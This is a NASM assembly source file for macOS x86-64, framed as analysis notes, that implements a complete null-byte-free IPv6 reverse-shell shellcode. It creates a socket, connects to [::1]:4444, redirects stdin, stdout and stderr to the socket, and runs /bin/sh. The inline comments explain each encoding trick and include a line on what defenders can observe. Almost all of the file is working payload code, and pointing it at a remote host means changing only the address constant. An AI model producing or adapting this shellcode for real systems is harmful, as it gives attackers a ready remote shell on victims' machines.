;nasm -f macho64 -o ipv6rev.o ipv6rev.s && ld -macosx_version_min 10.7.0 -o ipv6rev ipv6rev.o
;-----------------------------------------------------------------------
; macosx-ipv6rev.s -- macOS x86-64 IPv6 reverse-shell sample (analysis notes)
; Syntax: NASM (Intel), Mach-O 64, raw `start` entry point, no libc.
; What the instructions below do, in order:
;   fd = socket(AF_INET6, SOCK_STREAM, 0)
;   connect(fd, &sockaddr_in6{ [::1]:4444 }, 28)
;   dup2(fd, 2); dup2(fd, 1); dup2(fd, 0)
;   execve("//bin/sh", NULL, NULL)
; ABI: raw macOS syscalls; rax = 0x2000000 (BSD class) | syscall number;
;      args in rdi, rsi, rdx; result in rax.  macOS reports failure via
;      CF, and nothing here checks it, so a failed connect() still falls
;      through to dup2/execve.
; Encoding: every constant is built without zero bytes (mul-by-zero,
;      ror, not, neg, byte-wide moves), which is why the code reads
;      oddly; the decoded values are given at each site.
; Register roles: r8 = 0x2000000 class base, kept across syscalls
;      (assumes the kernel preserves r8/rdx; only rcx/r11 are clobbered
;      by `syscall`); rdi = socket fd from the first syscall onward.
; Observable behaviour for defenders: a TCP connect to [::1]:4444 and
;      a /bin/sh whose fds 0/1/2 are that socket.
;-----------------------------------------------------------------------
BITS 64
section .text
global start
start:
; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
xor rdi, rdi                    ; rdi = 0
mul rdi                         ; rdx:rax = rax * 0 -> zeroes rax AND rdx (rdx is reused as connect's addrlen below)
mov dil, 0x1e                   ; rdi = 30 = AF_INET6 (macOS value)
xor rsi, rsi
mov sil, 0x1                    ; rsi = 1 = SOCK_STREAM
mov al, 0x2
ror rax, 0x28                   ; rotate 0x2 right by 40 bits -> rax = 0x2000000 (BSD syscall-class prefix)
mov r8, rax                     ; keep the class prefix in r8; copied back into rax before each later syscall
mov al, 0x61                    ; rax = 0x2000061 = socket (97)
syscall                         ; rax = fd (error via CF, not checked)
; struct sockaddr_in6 {         (28 bytes, built on the stack by the four pushes below;
; __uint8_t sin6_len;            the last push lands at the lowest address = start of struct)
; sa_family_t sin6_family;
; in_port_t sin6_port;
; __uint32_t sin6_flowinfo;
; struct in6_addr sin6_addr;
; __uint32_t sin6_scope_id;
; };
xor rsi, rsi
push rsi                        ; sin6_scope_id = 0 (+4 bytes of padding above the struct)
mov rbx, 0xfeffffffffffffff
not rbx                         ; rbx = 0x0100000000000000
push rbx                        ; in6_addr bytes 8..15 = 00 00 00 00 00 00 00 01
push rsi                        ; in6_addr bytes 0..7  = 0   -> address ::1 (loopback)
mov rsi, 0xffffffffa3eee1e4
neg rsi                         ; rsi = 0x5c111e1c
push rsi                        ; memory: 1c 1e 11 5c 00 00 00 00 ->
                                ;   sin6_len = 0x1c (28), sin6_family = 0x1e (AF_INET6),
                                ;   sin6_port = 0x115c network order = 4444, sin6_flowinfo = 0
push rsp
pop rsi                         ; rsi = &sockaddr_in6 (current top of stack)
; connect(sockid, &sockaddr, 28)
mov rdi, rax                    ; rdi = fd returned by socket()
xor dl, 0x1c                    ; rdx = 28 only if rdx is still 0 from `mul` -- assumes the socket syscall left rdx untouched; verify
mov rax, r8
mov al, 0x62                    ; rax = 0x2000062 = connect (98)
syscall                         ; result ignored
xor rsi, rsi
mov sil, 0x3                    ; loop counter: decremented before each call, so targets are fds 2, 1, 0
dup2:
; dup2(sockid, 2)
; -> dup2(sockid, 1)
; -> dup2(sockid, 0)
mov rax, r8
mov al, 0x5a                    ; rax = 0x200005a = dup2 (90); rdi still holds the socket fd
sub sil, 1                      ; rsi = 2, then 1, then 0
syscall
test rsi, rsi
jne dup2                        ; loop exits with rsi = 0, which is reused as argv = NULL below
; execve("//bin/sh", 0, 0)
push rsi                        ; NUL terminator for the path string
mov rdi, 0x68732f6e69622f2f     ; "//bin/sh" little-endian; exactly 8 bytes, so no zero padding byte is needed
push rdi
push rsp
pop rdi                         ; rdi = pointer to "//bin/sh"
xor rdx, rdx                    ; envp = NULL
mov rax, r8
mov al, 0x3b                    ; rax = 0x200003b = execve (59)
syscall                         ; no fallthrough handling if execve fails